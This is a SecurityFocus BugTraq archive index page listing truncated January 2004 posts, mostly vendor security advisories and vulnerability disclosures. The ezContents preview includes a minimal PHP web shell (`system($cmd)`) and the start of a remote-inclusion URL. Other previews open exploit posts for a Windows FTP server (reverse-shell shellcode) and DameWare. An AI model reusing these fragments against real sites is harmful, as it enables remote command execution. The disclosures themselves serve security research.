BugTraq Mode:
(Page 1567 of 1748)  < Prev  1562 1563 1564 1565 1566 1567 1568 1569 1570 1571 1572  Next >
Network Associates Product Security Contact 2004-01-14
Matt Moore (matt moore pentest co uk)
Hello list,

I wondered if anyone knew of a product security contact within Network
Associates, in particular for their McAfee line of products?

Up to this point I've tried:

security-alert (at) nai (dot) com [email concealed] (as described in bugtraq post from 2002)
Jim_Magdych (at) nai (dot) com [email concealed] (sender of above post)
sec_labs (at) nai (dot) com [email concealed]

[ more ]  [ reply ]
RE: Abuse report email for CitiBank/CitiCards? 2004-01-13
Lance James (lance james bakbone com)
www.securityfocus.com/infocus/1745

for a better and clear experience with Citibank folks and their responses.

-----Original Message-----
From: Nicholas Weaver [mailto:nweaver (at) CS.berkeley (dot) edu [email concealed]]
Sent: Monday, January 12, 2004 11:07 AM
To: winstrel
Cc: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: Re: Abuse r

[ more ]  [ reply ]
nCipher Advisory #8: payShield library may verify bad requests 2004-01-14
nCipher Support (technotifications us ncipher com)
nCipher Security Advisory No. 8
payShield library may verify bad requests
-----------------------------------------

SUMMARY
=======

When a command is issued to the payShield SPP library it may return
Status_OK regardless of what the real reply status w

[ more ]  [ reply ]
[RHSA-2004:006-01] Updated kdepim packages resolve security vulnerability 2004-01-14
bugzilla redhat com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ---------------------------------------------------------------------
Red Hat Security Advisory

Synopsis: Updated kdepim packages resolve security vulnerability
Advisory ID: RHSA-2004:006-01
Issue date: 2004-0

[ more ]  [ reply ]
exploit for HD Soft Windows FTP Server 1.6 2004-01-13
mandrag mandragore solidshells com
/*

date: 12 janv 2004
subject: PoC exploit for Windows Ftp Server v1.6
vendor: http://srv.nease.net
credits: Peter Winter-Smith for the bug discovery
shellcode: reverse shell (~ 200 bytes)
notes: universal (doesn't rely on NT version), 2nd version of th

[ more ]  [ reply ]
symlink vul for Antivir / Linux Version 2.0.9-9 (maybe lower) 2004-01-13
Rene (l0om excluded org)


discovered and written: l0om <l0om (at) excluded (dot) org [email concealed]>

date: 13.01.2004

risk: medium

page: www.excluded.org

symlink vul for Antivir / Linux Version 2.0.9-9

(maybe lower)

antivir gets started on bootup and creats a tmp file

(/tmp/.pid_antivir_$$ - where

$$ is the process id).

[ more ]  [ reply ]
PhpDig 1.6.x: remote command execution 2004-01-14
FraMe (frame hispalab com)
Product: PhpDig 1.6.x
Vendor: phpdig.net
Author: FraMe ( frame at kernelpanik.org )
URL: http://www.kernelpanik.org

CONTENTS

1. Overview
2. Description.
3. Details
4. Patches.

1. Overview.

PhpDig is a http spider/search engine written in Php with a MySql
database in backend. PhpDig builds a glos

[ more ]  [ reply ]
SRT2004-01-9-1022 - Symantec LiveUpdate allows local users to become SYSTEM 2004-01-12
KF (dotslash snosoft com)
As usual full details are available at http://www.secnetops.biz/research

-KF

[ more ]  [ reply ]
RE: [Fwd: [TH-research] OT: Israeli Post Office break-in] 2004-01-13
John Airey rnib org uk
> -----Original Message-----
> From: Gadi Evron [mailto:ge (at) egotistical.reprehensible (dot) net [email concealed]]
> Sent: 11 January 2004 04:07
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Cc: full-disclosure (at) lists.netsys (dot) com [email concealed]
> Subject: [Fwd: [TH-research] OT: Israeli Post Office break-in]
>
>
> I thought this story might interest

[ more ]  [ reply ]
[SECURITY] [DSA 423-1] New Linux 2.4.17 packages fix several problems (ia64) 2004-01-15
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 423-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
January 15th, 2004

[ more ]  [ reply ]
Linux kernel mremap() bug update 2004-01-15
Paul Starzetz (ihaquer isec pl)

Synopsis: Linux kernel do_mremap local privilege escalation vulnerability
Product: Linux kernel
Version: 2.4 up to 2.4.23 and 2.6.0
Vendor: http://www.kernel.org/

URL: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?

[ more ]  [ reply ]
RapidCache Multiple Vulnerabilities 2004-01-15
Peter Winter-Smith (peter4020 hotmail com)
RapidCache Multiple Vulnerabilities

###################################

Credit:
Author : Peter Winter-Smith

Software:
Packages : RapidCache
Versions : 2.2.6 and below
Vendor : Vicomsoft
Vendor Url : http://www.vicomsoft.com/rapidcache/rapidcache.main.html

Vulnerability:
Bug Type :

[ more ]  [ reply ]
January 15 is Personal Firewall Day, help the cause 2004-01-15
tlarholm pivx com
I just wanted to remind everybody that tomorrow is Personal Firewall Day.

http://www.personalfirewallday.org/

The Personal Firewall Day is a campaign designed to raise awareness about the dangers we face without a personal firewall. Security experts such as yourself are encouraged to use the

[ more ]  [ reply ]
CERT Advisory CA-2004-01 Multiple H.323 Message Vulnerabilities 2004-01-14
CERT Advisory (cert-advisory cert org)

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2004-01 Multiple H.323 Message Vulnerabilities

Original release date: January 13, 2004
Last revised: --
Source: CERT/CC, NISCC

A complete revision history can be found at the end of this file.

Systems Affected

* Many softwar

[ more ]  [ reply ]
[slackware-security] INN security update (SSA:2004-014-02) 2004-01-15
Slackware Security Team (security slackware com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security] INN security update (SSA:2004-014-02)

INN (InterNetNews) is used to run a news (NNTP) server.

New INN packages are available for Slackware 9.0, 9.1, and -current.
These have been upgraded to inn-2.4.1 to fix a potentially
exploi

[ more ]  [ reply ]
SuSE linux 9.0 YaST config Skribt [exploit] 2004-01-13
Rene (l0om excluded org)


Author: l0om <l0om (at) excluded (dot) org [email concealed]>

Date: 12.01.2004

page: www.excluded.org

SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem

There is a symlink problem in the

SuSEconfig.gnome-filesystem

scribt. a normal user can creat and overwrite every

file

on the system. This

[ more ]  [ reply ]
[SECURITY] [DSA-422-1] multiple CVS improvements 2004-01-13
Wichert Akkerman (wichert wiggy net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------

Debian Security Advisory DSA-422-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Wichert Akkerman
January 13, 2004
- -------------

[ more ]  [ reply ]
FW: Abuse report email for CitiBank/CitiCards? 2004-01-12
Sullivan, Barbra A (barbra a sullivan citigroup com) (1 replies)
All,

To report such issues for Citibank or Citicards, please refer to the about email fraud link on www.citibank.com or www.citi.com.

Regards,

Barbra Sullivan
Citigroup

-----Original Message-----
From: winstrel [mailto:winstrel (at) ewall (dot) org [email concealed]]
Sent: Saturday, January 10, 2004 3:36 PM
To: bugtraq@secu

[ more ]  [ reply ]
Re: FW: Abuse report email for CitiBank/CitiCards? 2004-01-12
Nicholas Weaver (nweaver CS berkeley edu)
[slackware-security] kdepim security update (SSA:2004-014-01) 2004-01-15
Slackware Security Team (security slackware com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security] kdepim security update (SSA:2004-014-01)

New kdepim packages are available for Slackware 9.0 and 9.1 to
fix a security issue with .VCF file handling. For Slackware -current,
a complete upgrade to kde-3.1.5 is available.

Here a

[ more ]  [ reply ]
MDKSA-2004:003 - Updated kdepim packages fix vulnerability 2004-01-15
Mandrake Linux Security Team (security linux-mandrake com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandrake Linux Security Update Advisory
_______________________________________________________________________

Package name: kdepim
Advisory ID:

[ more ]  [ reply ]
SUSE Security Announcement: Linux Kernel (SuSE-SA:2004:003) 2004-01-15
thomas suse de (Thomas Biege)

-----BEGIN PGP SIGNED MESSAGE-----

________________________________________________________________________
______

SUSE Security Announcement

Package: Linux Kernel (x86_64, AMD64)
Announcement-ID: SuSE-SA:2004:003
Date:

[ more ]  [ reply ]
[RHSA-2004:003-01] Updated CVS packages fix minor security issue 2004-01-12
bugzilla redhat com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ---------------------------------------------------------------------
Red Hat Security Advisory

Synopsis: Updated CVS packages fix minor security issue
Advisory ID: RHSA-2004:003-01
Issue date: 2004-01-05
Upda

[ more ]  [ reply ]
Remote Code Execution in ezContents 2004-01-10
Zero_X www.lobnan.de Team (zero-x linuxmail org)


Remote Code Execution in ezContents

"ezContents" from www.ezcontents.org allows to execute code.

Example:

Create the following file on your webserver:

----index.php----

<?

system($cmd);

?>

-----------------

And then type in the following URL:

http://targethost/module.php?link

[ more ]  [ reply ]
DameWare Mini Remote Control < v3.73 remote exploit by kralor] 2004-01-10
Iván Rodriguez Almuiña (kralor coromputer net)
/***********************************************************************
***************/
/* [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by
kralor [Crpt] */
/* - - - - - - - - - - - - - - - - - -
- - - */
/* 8/10 win2k successfully exploi

[ more ]  [ reply ]
Directory Traversal in Accipiter Direct Server 6.0 2004-01-09
Bassett, Mark (mbassett omaha com)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-

~ Severity: High
~ Title: Accipiter Direct Server
~ Date: January 09, 2004

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-

Synopsis
========

A security vulnerability has been found in Ac

[ more ]  [ reply ]
Abuse report email for CitiBank/CitiCards? 2004-01-10
winstrel (winstrel ewall org)
Anyone know valid email addresses for reporting potential abuse or fraud at
to CitiBank.com/CitiCards.com?

I'd like to forward some fraud emails (e.g. "Please go to this link and
enter your card number and PIN that you use for ATM access...") for their
information, but most of the usual suspects (a

[ more ]  [ reply ]
PHP Manpage lookup directory transversal / file disclosing 2004-01-10
Cabezon Aurélien (aurelien cabezon isecurelabs com)
Hi ppl,

_Manpage Lookup_ is a PHP class that helps you to build a "manpage"
frontend in php. It is powered by Andy (http://php.amnuts.com).

The script _class.manpagelookup.php_ was vulnerable to a directory
transversal bug (because of leaks is input validation) that could lead
to disclose any read

[ more ]  [ reply ]
[SECURITY] [DSA 420-1] New jitterbug packages fix arbitrary command execution 2004-01-12
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 420-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
January 12th, 2004

[ more ]  [ reply ]
(Page 1567 of 1748)  < Prev  1562 1563 1564 1565 1566 1567 1568 1569 1570 1571 1572  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus